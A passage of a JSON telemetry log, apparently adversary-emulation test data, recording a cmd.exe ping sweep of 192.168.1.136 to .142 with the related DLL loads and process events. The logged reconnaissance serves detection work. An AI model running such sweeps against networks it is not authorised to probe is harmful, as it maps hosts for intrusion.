"image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "process", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572646830000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.136", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5316, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572651830000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.137", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6876, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "process", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572656990000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.138", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6848, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572657130000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "process", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572661840000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.139", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3956, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "process", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572666990000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.140", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3960, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572667130000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667300000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "process", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572671830000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.141", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8164, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "process", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572676830000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.142", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": 